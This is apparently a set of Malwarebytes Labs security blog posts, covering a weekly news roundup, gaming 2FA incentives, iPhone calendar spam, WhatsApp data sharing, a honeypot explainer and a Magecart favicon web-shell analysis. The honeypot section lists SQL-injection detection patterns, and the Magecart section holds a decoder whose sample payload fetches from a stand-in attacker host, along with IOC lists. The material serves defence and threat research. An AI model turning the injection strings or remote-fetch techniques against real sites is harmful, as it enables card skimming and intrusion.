A week in security (May 10 – 16)

Last week on Malwarebytes Labs, we watched and reported on the Colonial Pipeline ransomware attack as developments unfolded. This attack prompted the White House to refine a planned Executive Order on cybersecurity. We also profiled DarkSide, the ransomware responsible for the Colonial Pipeline attack, and the criminal gang behind it.

Speaking of ransomware, we spoke with Jake Bernstein, a cybersecurity and privacy attorney and our guest on the latest Lock and Code podcast episode, about the legal ramifications victims may face when a ransomware attack turns into a data breach.

We also highlighted “wormable” Windows vulnerabilities in last week’s Patch Tuesday updates; touched on FragAttacks, a term used to describe newly found Wi-Fi vulnerabilities that affect essentially all Wi-Fi devices; addressed the question “Why MITRE ATT&CK matters”; warned about Avaddon, a new ransomware campaign; raged about WhatsApp call and message features breaking unless you share data with Facebook; applauded game developers who made cybersecurity part of the whole gaming experience; and went “ooh!” at a novel way someone can exfiltrate data out of air-gapped networks using iPhones and AirTags.

Our expert threat hunters also noted the increase in iPhone spam attacks and observed Magecart Group 12 continuing to go strong and using a PHP-based skimmer as a new tool.

Lastly, we talked about Wi-Fi and honeypots.

Other cybersecurity news

  • The group behind the Colonial Pipeline attack claimed to be behind the Toshiba attack and data breach. (Source: Kyodo)
  • DarkSide also netted Brenntag, a chemical distribution company, and got paid for it—to the tune of $4.4M USD. (Source: BleepingComputer)
  • Imposter Amazon robocalls are reaching 150 million consumers per month, according to YouMail. (Source: PR Newswire)
  • Threat actors take advantage of routine site maintenance to get people to download malicious copies of MSI Afterburner from a fake website. (Source: MSI News)
  • According to a report from Immersive Labs, 81 percent of software developers have knowingly released applications that are vulnerable. (Source: Immersive Labs)
  • Panda, a new information stealer, could nab account credentials of NordVPN, Telegram, Discord, and Steam users. It also goes after cryptocurrency wallets. (Source: The Coin Radar)
  • A report on TeaBot, a new Android malware targeting European banks, was released. (Source: Cleafy)
  • Users are at risk as they continue to use Windows 7, which has already reached its end of life. (Source: Security Brief)

Stay safe!

The post A week in security (May 10 – 16) appeared first on Malwarebytes Labs.

Gamers level up with rewards for better security

There was a time when stolen gaming accounts were almost treated as a fact of life. Console hacks weren’t taken particularly seriously. Security research in this area was occasionally derided as unimportant or trivial. Gaming accounts had an essence of innate disposability to them, even if this wasn’t the case (how disposable is a gamertag used to access hundreds of dollars’ worth of gaming content?).

These days, gaming security is taken very seriously indeed. The gradual roll-out of Two-factor Authentication (2FA) across both gaming platforms and titles themselves is a wonderful thing, but one worries about buy-in. When sign-up rates for something as common as Google accounts are struggling to hit double figures, it’s definitely a concern.

Customer support: compromised accounts all the way down

There’s also the impact on publisher bottom lines. More stolen accounts means more time tying up customer support lines. If the victims of the stolen accounts have invested lots of money into a title, there’s the possibility of bad press should it get that far. Forgotten passwords will tie up support’s time, for sure. But the moment someone calls through with one single account compromise, the customer service rep has no idea what they’re walking into.

It could be a fairly straightforward phish. Alternatively, someone may have imitated a game developer on a Twitch stream. Did the attacker bypass text-based 2FA by social engineering the mobile provider? Perhaps the victim fell for bogus loot crates via a YouTube video. Fake game developers sending private messages? You bet.

The possibilities are endless, and also potentially endlessly time consuming.

The digital expansion of gaming

Games haven’t been a one-purchase-and-done procedure for a long time. Downloadable content, expansions, and the concept of “Games as a Service” mean content can flow forevermore. This is particularly true in the realm of Massively Multiplayer titles. It’s not uncommon for the most popular games to keep on trucking for a decade or longer. These titles offer a variety of payment options.

Some games are a one-off payment with paid-for expansions down the line. Others might have a free-to-play option, with subscription accounts for more features and content access. A few mix all of these approaches, and there’s really no set standard.

When roleplaying sets the stage for security

MMORPGs are one online realm where security has been a big part of the overall package for years. Developers had the foresight to realise account protection would become increasingly important over time. World of Warcraft developers Blizzard released their first authenticator way back in 2009. People are often surprised when they find out how long WoW has had authentication in place. Yes, this may well be something of an outlier. They’ve also run into occasional issues with people trying to bypass the system.

Even so, this is probably one of the ways mainstream gamers run into this kind of authentication for the very first time. When the biggest organisations in a space use this tech, it hopefully encourages other companies to consider doing the same thing. In 2018, they were offering backpack upgrades for anybody using authentication and their SMS Protect service.

An increasingly valuable treasure chest

What I’m fascinated by is MMORPGs with frequently expensive in-game items bought with real money. Those in-game stores often offer premium items, and it can quickly turn into an expensive hobby. Some items are cosmetic; others give in-game benefits, which can occasionally draw “pay to win” accusations.

However you stack it up, accounts with lots of purchases are incredibly valuable targets. Going back to what I said earlier, the last thing Big Game Company Inc needs is a ton of bad press where they weren’t seen to be helping “premium” gamers. They also don’t want support channels flooded with stolen account calls.

In 2012, Steam encouraged users to enable Steam Guard in return for a badge during a community event. In 2015, they took this one step further and offered sale discounts.

A few months prior to this, MMORPG developers were already gamifying 2FA and offering rewards for enabling it. ArenaNet, developers of Guild Wars 2, were handing out a cool looking dragon for enabling 2FA. Here’s another game from 2015, Wakfu, which seems to have given small stat bonuses for using their 2FA system.

The security problems facing game developers

I’m not sure if 2015 was some sort of specific flashpoint for “everybody start using this, please” but clearly the groundwork was being laid. Due to a lot of videogame reporting being lost to the ages via link rot, I’m also uncertain if games using 2FA years prior to this offered up incentives for using it. I would assume quite a few of the older titles would say the incentive was simply “not losing your account”. Perhaps this is one reason why uptake is low. After all, people are complaining about the hassle of having to use it despite freebies on the Wakfu forums.

With this in mind, what we have is:

  • Users reluctant to use the tech
  • Depending on the game, a potentially very young audience who may not want the hassle of setting up 2FA
  • Accounts in use for long periods of time, with significant years of purchases behind them

This is clearly not ideal. As a result, gamifying the overall approach and offering up perks and items is the way to go.

Some current examples of security bonuses

Black Desert Online

A few months ago, the incredibly popular MMORPG Black Desert Online ran a “security campaign” event. If players set up an OTP (one-time password) process for their logins, they were rewarded with a 7-day value pack. These value packs are incredibly useful for BDO players. They grant significant boosts for loot collection, buffs, inventory, storage, weight limit, marketplace sales, and much more.

If you’re even a semi-serious BDO player, these are prized items and you’ve likely bought quite a few, or grinded out events to get some for free. The alternative is paying for a variety of different Value Packs in the game’s Pearl Store via real money transactions. Although the event is now over, I’d be surprised if it doesn’t get another outing.

Star Wars: The Old Republic

This Bioware / EA juggernaut has been around for a few years and shows no signs of slowing down. It’s essentially free to play, but with various restrictions applied unless you purchase a subscription. It also contains an in-game store which offers up cosmetics, items, large scary animals which you can ride around on, the works.

I’ve played quite a few MMORPGs where large store purchases are involved, yet there often seems to be a lack of additional security to help keep accounts secure in some titles. That’s not the case here, as we’ll see.

The basic rule with premium stores is, everything is pretty expensive. There may be essential items like storage capacity or crafting bags hidden behind paywalls. You might be able to buy a house for cheap, but then you have to spend a lot more money to fill it with items or even unlock different rooms.

Developers really want you to feel that premium, exclusive angle on every purchase you make. As a result, anything given away for free in many games is often not very good. You’ll almost never get any of those premium items for free unless it’s during a special event.

Items are usually purchased with special forms of in-game currency. That is usually bought via a gaming platform for real money. In Star Wars: The Old Republic, this currency is called Cartel Coins. Developers don’t give premium store funds away for free, because that wouldn’t make any sense.

And yet.

One of the big pulls for setting up 2FA with the game’s dedicated authenticator app is indeed free premium currency. As a bonus for setting up the app, gamers are rewarded with 100 Cartel Coins a month. That’s 1,200 coins every year the app is ticking over, which is certainly enough to buy an item or two a month, or one of the bigger discounted bundles once the player breaks the 1,000 barrier.

I’m not sure if this giveaway approach is something which coincided with the release of the app, or an additional perk which came later. As far as encouraging players to make use of additional security features, I’d give this effort 10/10.

Final Fantasy Online

Square Enix are big on one-time passwords. They use various options, like physical security tokens or software authentication, to get the lockdown job done. Their in-game reward is free teleportation. Many MMORPGs charge nominal amounts to fast travel, which adds up very quickly. This is a fantastic way to get buy-in from an MMORPG audience.

Gaming platform account bonuses

It’s not just individual games handing out the freebies. Gaming platforms like the Epic Store are getting in on the act too. In 2018, if you added 2FA to your Epic Games account, you received a free skin.

This may not sound like much but trust me, kids love free gaming skins.

As of 2019, the offer had broadened out considerably. In addition to a skin, players also received armory slots, backpack slots, and a free legendary troll stash Llama because hey, why not.

Interestingly, the 2FA reward program isn’t just limited to platform logins and Fortnite. If you want to keep claiming the endless selection of free titles offered on the Epic Store, you now need 2FA up and running. No additional security? No free games.

This is smart in a realm where Steam arguably still rules the roost in terms of most established PC gaming platform. By carving out chunks of the Epic Store’s most impressive platform offerings and placing them behind good security practices, the pull factor is no doubt strong. There have to be a good chunk of Epic users now sporting much better protected accounts, and that’s a win-win.

Closing thoughts

While some gamers will quibble about the value of giveaways on some titles, ultimately the devs are doing them a favour. When the worst case scenario is “You don’t lose your account to compromise”, that sounds like a pretty good deal to me. Receiving some free goodies to feed back into your gameplay loop is the icing on the cake. An easy win for everybody apart from account thieves is surely the best Game Over screen we can hope for.

The post Gamers level up with rewards for better security appeared first on Malwarebytes Labs.

iPhone calendar spam attacks on the rise

Recently, we have seen an increasing number of reports from iPhone users about their calendars filling up with junk events. These events are most often either pornographic in nature, or claim that the device has been infected or hacked, and in all cases they contain malicious links. This phenomenon is known as “calendar spam.”

Calendar spam became a big problem for Apple’s iCloud calendars back in 2016. At that time, Apple put some protections in place on iCloud to prevent these issues. Whatever they did was working until recently. Let’s take a look at how the scammers have changed their tactics.

Fake captcha page example

Users will encounter a scam web page like the following one (though this is just an example). These pages are reached via a number of techniques, including malvertising, compromised WordPress sites, and Search Engine Optimization (SEO) tricks. In this case, the page displays a fake captcha that users are expected to tap in order to prove they’re not a bot.

Fake captcha web page

For this particular page, tapping the “I’m not a robot” box (or, really, anywhere else on the page) results in a prompt attempting to trick the user into subscribing to a calendar.

iOS alert to obtain consent to add the calendar

Normally, this prompt would ask the user if they want to subscribe to a particular calendar by name. In this case, the scammers have given the calendar a name containing whitespace and the “Tap OK to Continue” / “Tap Cancel to Close Browser” message. Clicking Cancel will return you to the page, and if you do this a couple times, you’ll trigger a redirect. (More on that shortly.)

Clicking OK results in the spam calendar, and all its events, being added to the user’s Calendar app. These events all have alerts that cause notifications to appear in the Notification Center. Tapping a notification will take you into Calendar, which will display the content of the event. In all cases, the content is a scam message trying to get you to open a link.

Details from a spam calendar event, reading "A suspicious program may be using 90% of your memory"

At this time, the links go to a 404 page, but we believe they would have linked out to apps in Apple’s App Store.

Redirects to “security” apps

Whether you do or don’t subscribe to the calendar, the page will go back to the fake captcha. Tapping the captcha a second time, and clicking either OK or Cancel, will result in your browser being redirected to a scam page claiming your iPhone is infected or that hackers are watching you.

A scam web page titled "Hackers are watching you!"
A scam web page titled "WARNING! Your Apple iPhone is severely damaged by 13 viruses!"

These pages will redirect to a variety of App Store apps. Mostly, these are junk VPNs or supposed security apps. They mostly have high ratings, and have been around for 4+ years, but the total number of ratings given is low. This could be an indication that the ratings have been reset periodically.

Worse, many of these apps have high-price, short-duration subscriptions. In most cases, prices are around $8.99 or $9.99 per week.

App Store page for Guard Coil VPN

Removing the subscribed calendar(s)

If you have been impacted, your iPhone has fortunately not actually been hacked or infected (regardless of what the messages claim), and there is a simple solution. You can just delete the subscribed calendars.

First, open your Calendar app, and then tap the Calendars button at the bottom center of the screen, shown below.

iOS Calendar app showing spam events

This will result in seeing a view like the following, showing all the calendars loaded on your iPhone. Note the odd item with a green tick and no title, under the heading “SUBSCRIBED”.

The listing of all calendars shown in the Calendar app

The calendar name appears blank here, but that may not be true in every case. You’ll want to remove all subscribed calendars, except those that you are certain are legitimate. To do this, tap the button showing the letter i in a circle next to the subscribed calendar. (If you have more than one, you’ll have to repeat for each one.)

On the next screen, tap the Delete Calendar button at the bottom of the screen. (On some devices, you may have to scroll down to see it.)

Information about the unwanted calendar, including a Delete Calendar button

How to prevent the issue

First and foremost, if you find yourself seeing a strange message in Safari on your iPhone, don’t believe it, and don’t do what it tells you to do. Don’t click any buttons consenting to whatever the site is asking, such as OK, Allow, Install, etc. If you can close the tab or navigate to another page in the browser, do so. If an alert is preventing that, click Cancel if that’s an option.

If there is an alert preventing you from taking action until you tap a button, and you don’t know what to do, just restart your iPhone.

You can also use the Web Protection feature in Malwarebytes Security for iOS. This should prevent you from visiting malicious pages in Safari. Of course, as with all things, nothing is infallible, so if you find that a malicious site has slipped past, please copy the address of the page from Safari’s address bar and submit it via a support ticket to Malwarebytes support. A screenshot would help as well.

Unfortunately, since users are essentially consenting to this scam via existing Apple-provided mechanisms for obtaining consent, there may not be much that Apple can do to stop this particular wave of calendar spam. However, we’ve notified Apple anyway, and hope it can at a minimum take action against the apps promoted by these scams.

What about other platforms?

Although we’re seeing a lot of this on iOS right now, the scam affects other platforms as well. On macOS, for example, it will attempt to add a calendar, though the process is far less convincing.

macOS alert asking the user to consent to subscribe to a calendar

The same is also true on Windows.

Windows alert asking the user to choose an app to open a webcal link with

You may also be offered a browser extension by some variants of this scam, depending on your browser. (Google Chrome is a common target.)

Regardless of the platform, if you see something odd like this in the browser, do not allow it, and close the page.

The post iPhone calendar spam attacks on the rise appeared first on Malwarebytes Labs.

WhatsApp calls and messages will break unless you share data with Facebook

WhatsApp told users last week that there was no need for alarm regarding an upcoming privacy policy deadline, as users who refuse to accept the privacy policy will not have their accounts deleted—they will just have their apps rendered useless, eventually incapable of receiving calls and messages.

The planned removal of core features represents a stunning reversal for a company that long ago prioritized data privacy, transforming WhatsApp’s offering into an unworkable contradiction: Private messaging only for those who surrender a separate piece of their privacy.

At issue is WhatsApp’s 2021 privacy policy, which users first learned about in January. According to notifications sent at that time, WhatsApp began asking users to agree to share some of their data with WhatsApp’s parent company—Facebook—by a February 8 deadline.

That data does not include the content of any WhatsApp user’s messages or calls, as the company’s end-to-end encryption remains intact, and WhatsApp has repeatedly promised that its message security will not be compromised. However, the data does include interactions that users have with certain businesses over WhatsApp. And, per the new privacy policy, the entities at Facebook that will have access to that data include Facebook itself, Facebook Payments, Facebook Technologies, Onavo, and CrowdTangle.

The January notifications triggered an avalanche of departures, with many people ditching the service to install a separate, private messaging app called Signal. According to a report from TechCrunch, in just five days in January, the rival private messenger was downloaded more than 7.5 million times—growing its overall userbase at the end of 2020 by more than one third. Similar, meteoric growth was enjoyed by another private messaging app, Telegram.

But to hear WhatsApp tell the story, users got the wrong impression about the 2021 privacy policy update. The company tried to explain to some news outlets that the changes were not as dramatic as many had interpreted because the changes were not even new.

They had been in place since 2016.

According to reporting from Wired, in August of 2016, WhatsApp quietly updated its data sharing practices with Facebook:

“Under the new user agreement, WhatsApp will share the phone numbers of people using the service with Facebook, along with analytics such as what devices and operating systems are being used,” Wired wrote at the time. “Previously, no information passed between the two, a stance more in line with WhatsApp’s original sales pitch as a privacy oasis.”

Those changes came with an opportunity for then-existing WhatsApp users to opt out of the impact of that data sharing, but every new WhatsApp user who installed the app after those 2016 changes received no such option. Some of their data, according to Wired, was automatically sent to Facebook per WhatsApp’s new rules.

Technically, then, WhatsApp was right: Users misunderstood the January 2021 privacy policy notifications. There were no dramatic shifts in how WhatsApp would share data with Facebook, just minor changes to how WhatsApp will handle and share business-related interactions.

But those explanations did not sit right with users, security researchers, or digital rights activists.

As Matthew Green, cryptographer and professor at Johns Hopkins University, told Wired:

“WhatsApp is great for protecting the privacy of your message content. But it feels like the privacy of everything else you do is up for grabs.”

Gennie Gebhart, the acting director of activism at Electronic Frontier Foundation, also criticized WhatsApp’s unclear messaging in January.

“WhatsApp’s obfuscation and misdirection around what its various policies allow has put its users in a losing battle to understand what, exactly, is happening to their data,” Gebhart wrote.

The public blowback caused WhatsApp to postpone its initial February 8 deadline to May 15, and in the weeks in between, many users feared that the company would simply delete their accounts if they refused to accept the updated privacy policy.

But last week, WhatsApp clarified that “no one will have their accounts deleted or lose functionality of WhatsApp” on May 15 because of their choices to refuse to accept the new privacy policy.

Unfortunately, the alternative is nearly as harsh.

For WhatsApp users who decline to have their data shared with Facebook, WhatsApp will steadily remove core features, beginning with the option to view chat lists, and ending with the inability to even receive calls or messages on WhatsApp.

WhatsApp said that it has warned users about its new data policy agreement for weeks now. For users who do not agree to the privacy policy changes by May 15, WhatsApp said that “after a period of several weeks” the notification they’ve received will become persistent. At that point, WhatsApp said it will dole out consequences.

The company said:

“At that time, you’ll encounter limited functionality on WhatsApp until you accept the updates. This will not happen to all users at the same time.

You won’t be able to access your chat list, but you can still answer incoming phone and video calls. If you have notifications enabled, you can tap on them to read or respond to a message or call back a missed phone or video call.

After a few weeks of limited functionality, you won’t be able to receive incoming calls or notifications and WhatsApp will stop sending messages and calls to your phone.”

What message are users supposed to take from these limitations other than the fact that WhatsApp simply does not want users who refuse to share their data with Facebook? A private messaging app that cannot receive messages is useless, and it is ludicrous that the reason it is useless is because the company has chosen to make it that way.

This is an anti-privacy choice. It is also an anti-user choice, as users are being punished for their refusal to share data. And, finally, it is a sad but expected turn for WhatsApp, a former privacy darling launched by two co-founders—Jan Koum and Brian Acton—who both seemingly regret selling their company to Facebook for billions of dollars.

That sale in 2014 startled many users, as the two companies—one, a steadily-growing advertising giant, the other led by a man whose motto was reportedly “no ads, no games, no gimmicks”—were diametrically opposed. At the time, Koum tried to calm those fears, saying that “if partnering with Facebook meant that we had to change our values, we wouldn’t have done it.”

Four years later, Koum left. His co-founder, Acton, had left the year prior.

In an exclusive interview with Forbes, Acton explained his departure. Much of it was due to conflicting ideas on privacy.

“At the end of the day, I sold my company. I sold my users’ privacy to a larger benefit. I made a choice and a compromise,” Acton said. “And I live with that every day.”

In 2018, Acton donated $50 million to a familiar cause with a different name: the development of Signal.

The post WhatsApp calls and messages will break unless you share data with Facebook appeared first on Malwarebytes Labs.

What is a honeypot? How they are used in cybersecurity

Cybersecurity experts strive to enhance the security and privacy of computer systems. Quietly observing threat actors in action can help them understand what they have to defend against. A honeypot is one such tool that enables security professionals to catch bad actors in the act and gather data on their techniques. Ultimately, this information allows them to learn and improve security measures against future attacks.

Definition of a honeypot

What does “honeypot” mean in cybersecurity? In layman’s terms, a honeypot is a computer system intended as bait for cyberattacks. The system’s defenses may be weakened to encourage intruders. While cybercriminals infiltrate the system or hungrily mine its data, behind the smokescreen, security professionals can study the intruder’s tools, tactics and procedures. You might think of it as laying a trap for someone you know is coming with bad intentions and then watching their behavior so you can better prepare for future attacks.

Types of honeypots

In the world of cybersecurity, a honeypot appears to be a legitimate computer system, while the data is usually fake. For example, a media distribution company may host a bogus version of a film on a computer with intentional security flaws to protect the legitimate version of the new release from online pirates.

There are several different types of honeypots. Each has its own set of strengths. The kind of security mechanism an organization uses will depend on their goals and the intensity of threats they face.

Low-interaction honeypots

A low-interaction honeypot offers hackers emulated services with a narrow level of functionality on a server. The objective of this trap is usually to learn an attacker’s location and nothing more. Low-interaction honeypots are low-risk, low-reward systems.
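
As a minimal sketch of the idea (the fake SSH banner and the logging scheme here are our own illustrative assumptions, not a production tool), a low-interaction honeypot can be as simple as a socket listener that records who connects and answers with an emulated service banner:

```python
import socket
import threading
import datetime

def run_honeypot(host="127.0.0.1", port=2222, max_conns=1):
    """Minimal low-interaction honeypot.

    Pretends to be an SSH service: records each visitor's source
    address and timestamp, sends back a fake banner, and offers no
    real functionality behind it.
    """
    log = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen()
    for _ in range(max_conns):
        conn, addr = srv.accept()
        # The only intelligence gathered: who connected, and when.
        log.append({"ip": addr[0],
                    "time": datetime.datetime.utcnow().isoformat()})
        conn.sendall(b"SSH-2.0-OpenSSH_7.4\r\n")  # emulated banner only
        conn.close()
    srv.close()
    return log
```

Everything past the banner is absent by design, which is exactly why this style of honeypot is low-risk and low-reward.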

High-interaction honeypots

Unlike the low-interaction variety, a high-interaction honeypot offers a hacker plenty to do on a system with few restrictions. This high-interaction ploy aims to study a threat actor for as long as possible and gather actionable intelligence.

Email traps

Technology companies use email traps to compile extensive deny lists of notorious spam agents. An email trap is a fake email address that attracts mail from automated address harvesters. The mail is analyzed to gather data about spammers, block their IP addresses, redirect their emails, and help keep spam out of users’ inboxes.
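
The mechanics can be sketched in a few lines (the addresses, field names, and return labels below are hypothetical, chosen just for illustration): any sender that mails a never-published trap address is added to a denylist, which then filters their future mail.

```python
def process_message(msg, trap_addresses, denylist):
    """Classify an inbound message against a set of email traps.

    Mail sent to a trap address that was never given to a human almost
    certainly came from an automated address harvester, so the sending
    IP goes straight onto the denylist.
    """
    if msg["to"].lower() in trap_addresses:
        denylist.add(msg["source_ip"])
        return "trapped"
    if msg["source_ip"] in denylist:
        return "blocked"
    return "delivered"
```

A real deployment would also seed the trap address into places only scrapers look, such as HTML comments or invisible page elements, so no legitimate sender ever uses it.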

Decoy database

A SQL injection is a code injection technique used to attack databases. Network security experts create decoy databases to study flaws and identify exploits in data-driven applications in order to fight such malicious code.
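
A decoy lookup endpoint might look like the following sketch (the injection patterns, schema, and function name are illustrative assumptions, not a real product): it logs classic injection markers in the input while serving harmless data from a throwaway SQLite database.

```python
import re
import sqlite3

# Signatures of common SQL injection attempts (illustrative, not exhaustive).
INJECTION_PATTERNS = [
    r"(?i)\bunion\b.*\bselect\b",   # UNION-based data extraction
    r"(?i)\bor\b\s+1\s*=\s*1",      # tautology to bypass WHERE clauses
    r"--|/\*",                      # comment sequences that truncate queries
]

def decoy_lookup(user_input, attack_log):
    """Decoy 'product search' backed by a throwaway in-memory database.

    No real data lives here; the point is to record injection attempts
    so defenders can study the attacker's technique.
    """
    for pat in INJECTION_PATTERNS:
        if re.search(pat, user_input):
            attack_log.append({"input": user_input, "pattern": pat})
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (name TEXT)")
    db.execute("INSERT INTO products VALUES ('decoy widget')")
    # Parameterised query: the decoy itself is not exploitable.
    rows = db.execute(
        "SELECT name FROM products WHERE name = ?", (user_input,)
    ).fetchall()
    db.close()
    return rows
```

Note the contrast: the decoy records inputs that look like injections, but it queries its own data with bound parameters so the trap cannot be turned against it.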

Spider honeypot

A spider honeypot is a type of honeypot network that consists of links and web pages that only automated crawlers can access. IT security professionals use spider honeypots to trap and study web crawlers in order to learn how to neutralize malicious bots and ad-network crawlers.
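
One common implementation (the path and user-agent strings here are made up for illustration) is to publish a path as disallowed in robots.txt, link to it invisibly, and flag any client that requests it anyway, since no human and no well-behaved crawler ever should:

```python
TRAP_PATH = "/internal-archive/"  # disallowed in robots.txt, never linked visibly

ROBOTS_TXT = f"User-agent: *\nDisallow: {TRAP_PATH}\n"

# Hidden from humans; only harvesting crawlers parse and follow it.
HIDDEN_LINK = f'<a href="{TRAP_PATH}" style="display:none">archive</a>'

def classify_request(path, user_agent, bad_bots):
    """Flag any client that requests the trap path and block it afterwards."""
    if path.startswith(TRAP_PATH):
        bad_bots.add(user_agent)
        return "flagged"
    if user_agent in bad_bots:
        return "blocked"
    return "ok"
```

In practice a real deployment would key the denylist on IP address rather than user-agent (which is trivially spoofed); the string is used here only to keep the sketch short.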

Malware honeypot

A malware honeypot is a decoy that invites malware attacks. Cybersecurity professionals can use the data from such honeypots to develop advanced antivirus software for Windows or robust antivirus technology for Mac. They also study the malware attack patterns to enhance malware detection technology and thwart malspam such as GuLoader.

Pros and cons of honeypot use

Although there are many benefits of honeypots, they can also backfire if they fail to cage their prey. For example, a skilled hacker can use a decoy computer to their advantage. Here are some pros and cons of honeypots:

Benefits of using honeypots

  • They can be used to understand the tools, techniques and procedures of attackers.
  • An organization can use honeypots to ascertain the skill levels of potential online attackers.
  • Honeypotting can help determine the number and location of threat actors.
  • It allows organizations to distract hackers from authentic targets.

Dangers and disadvantages of using honeypots

  • A clever hacker may be able to use a decoy computer to attack other systems in a network.
  • A cybercriminal may use a honeypot to supply bad intelligence.
  • Its use can result in myopic vision if it’s the only source of intelligence.
  • A spoofed honeypot can result in false positives, leading IT professionals on frustrating wild goose chases.

While there are pros and cons, careful and strategic use of a honeypot to gather intelligence can help a company enhance its security response measures and stop hackers from breaching its defenses, leaving it less vulnerable to cyberattacks and exploits.

The post What is a honeypot? How they are used in cybersecurity appeared first on Malwarebytes Labs.

Newly observed PHP-based skimmer shows ongoing Magecart Group 12 activity

This blog post was authored by Jérôme Segura

Web skimming continues to be a real and impactful threat to online merchants and shoppers. The threat actors in this space greatly range in sophistication from amateurs all the way to nation state groups like Lazarus.

In terms of security, many e-commerce shops remain vulnerable because they have not upgraded their content management system (CMS) in years. The campaign we are looking at today involves a number of Magento 1 websites that have been compromised by a very active skimmer group.

We believe that Magecart Group 12, identified as being behind the Magento 1 hacking spree last fall, continues to distribute new malware that was observed by security researchers recently. These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores. This technique is interesting as most client-side security tools will not be able to detect or block the skimmer.

Web shell hidden as favicon

While performing a crawl of Magento 1 websites, we detected a new piece of malware disguised as a favicon. The file, named Magento.png, attempts to pass itself off as ‘image/png’ but does not have the proper PNG format for a valid image file.

It is injected into compromised sites by editing the shortcut icon tags with a path to the fake PNG file. Unlike previous incidents where a fake favicon image was used to hide malicious JavaScript code, this one turned out to be a PHP web shell.

Web shells are a very popular type of malware encountered on websites; they allow an attacker to maintain remote access and administration. They are typically uploaded onto a web server after exploitation of a vulnerability (e.g., SQL injection).

To better understand what it does, we can decode the reversed Base64-encoded blob. We see that it is meant to retrieve data from an external host at zolo[.]pw.
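As an illustration of this obfuscation style (a Base64 string stored reversed to defeat simple string matching), here is a hedged Python sketch. The payload and hostname are harmless stand-ins, not the actual malware:

```python
import base64

def decode_reversed_b64(blob: str) -> bytes:
    """Undo reverse-then-Base64 obfuscation: reverse the string, then decode."""
    return base64.b64decode(blob[::-1])

# Stand-in payload encoded the same way the text describes:
original = b"file_get_contents('https://attacker.example/path');"
encoded = base64.b64encode(original).decode()[::-1]

print(decode_reversed_b64(encoded))  # recovers the original snippet
```

Analysts routinely apply small transforms like this in sequence (reverse, Base64, gzip, XOR) until the plaintext logic of a web shell emerges.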

Further looking into the m1_2021_force directory reveals additional code very specific to credit card skimming.

The data exfiltration part matches what researcher Denis @unmaskparasites had found back in March on WordPress sites (Smilodon malware) which also steals user credentials:

A similar PHP file (Mage.php) was reported by SanSec as well:

That same path/filename was previously mentioned by SanSec during the Magento 1 EOL hacking spree:

This hints that we are possibly looking at the same threat actors then and now, which we can confirm by looking at the infrastructure being used.

Magecart Group 12 again

Because we found the favicon webshells on Magento 1.x websites we thought there might be a tie with the hacking that took place last year when exploits for the Magento 1 branch (no longer maintained) were found. RiskIQ documented these compromises and linked them with Magecart Group 12 at the time.

The newest domain name we found (zolo[.]pw) happens to be hosted on the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.

There is a lot of publicly documented material on the activities of Group 12, also known for their ‘ant and cockroach‘ skimmer, their decoy CloudFlare library, and their abuse of favicon files.

Dynamically loaded skimmer

There are a number of ways to load skimming code, but the most common one is by calling an external JavaScript resource. When a customer visits an online store, their browser makes a request to a domain hosting the skimmer. Although criminals constantly expand their infrastructure, it is relatively easy to block these skimmers using a domain/IP database approach.

In comparison, the skimmer we showed in this blog dynamically injects code into the merchant site. The request to the malicious domain hosting the skimming code is made server-side, not client-side. As such, a database blocking approach would not work here unless all compromised stores were blacklisted, which is a catch-22 situation. A more effective approach, though more complex and more prone to false positives, is to inspect the DOM in real time and detect when malicious code has been loaded.

We continue to track this campaign and other activities from Magecart Group 12. Online merchants need to ensure their stores are up-to-date and hardened, not only to pass PCI standards but also to maintain the trust shoppers place in them. If you are shopping online it’s always good to exercise some vigilance and equip yourself with security tools such as our Malwarebytes web protection and Browser Guard.

References

https://blog.group-ib.com/btc_changer

https://twitter.com/unmaskparasites/status/1370579966069383168?s=20

https://twitter.com/sansecio/status/1367404202461450244?s=20

https://twitter.com/unmaskparasites/status/1234917686242619393?s=20

https://community.riskiq.com/article/fda1f967

https://blog.sucuri.net/2020/04/web-skimmer-with-a-domain-name-generator.html

https://sansec.io/research/cardbleed

https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/

Indicators of Compromise

facedook[.]host
pathc[.]space
predator[.]host
google-statik[.]pw
recaptcha-in[.]pw
sexrura[.]pw
zolo[.]pw
kermo[.]pw
psas[.]pw
gooogletagmanager[.]online
imags[.]pw
y5[.]ms
autocapital[.]pw
myicons[.]net
qr202754[.]pw
thesun[.]pw
redorn[.]space
zeborn[.]pw
googletagmanagr[.]com
http[.]ps
xxx-club[.]pw

195[.]123[.]217[.]18
217[.]12[.]204[.]185
83[.]166[.]241[.]205
83[.]166[.]242[.]105
83[.]166[.]244[.]113
83[.]166[.]244[.]152
83[.]166[.]244[.]189
83[.]166[.]244[.]76
83[.]166[.]245[.]131
83[.]166[.]246[.]34
83[.]166[.]246[.]81
83[.]166[.]248[.]67

jamal.budunoff@yandex[.]ru
muhtarpashatashanov@yandex[.]ru
nikola-az@rambler[.]ru

The post Newly observed PHP-based skimmer shows ongoing Magecart Group 12 activity appeared first on Malwarebytes Labs.

What does WiFi stand for?

We use WiFi to connect to the Internet, but what is it, and what does it stand for? How does it have such a catchy name, and why do we sometimes have a weak Internet connection with a strong WiFi signal and vice versa? Read on to answer these questions and more.

What does WiFi mean?

Many people assume that WiFi is short for “wireless fidelity” because the term “hi-fi” stands for “high fidelity.” Some members of the WiFi Alliance, the wireless industry organization that promotes wireless technologies and owns the trademark, may even have encouraged this misconception.

The reality is that WiFi is a made-up marketing term that doesn’t really stand for anything. The Alliance tasked marketing company Interbrand with creating a palatable term that they could trademark because “Institute of Electrical and Electronics Engineers (IEEE) wireless communication standard 802.11 technology” doesn’t quite roll off the tongue.

How does WiFi work?

In a nutshell, WiFi is a wireless networking technology that allows wireless-capable devices like computers, tablets, smartphones, modems, microwaves, fridges, and routers to connect with each other through radio frequency signals. Any suitably equipped device can connect to a WiFi network, regardless of whether it, or the network it’s connecting to, has an Internet connection.

What is the difference between WiFi and Internet? Can you have WiFi without Internet?

Your computer can communicate with your router through a WiFi signal (or a cable) even if your router isn’t online. That’s why you can have a strong WiFi signal with a weak or nonexistent Internet connection. Similarly, your router can have a healthy Internet connection that feels slow to you because of a less-than-ideal WiFi signal between you and your router.

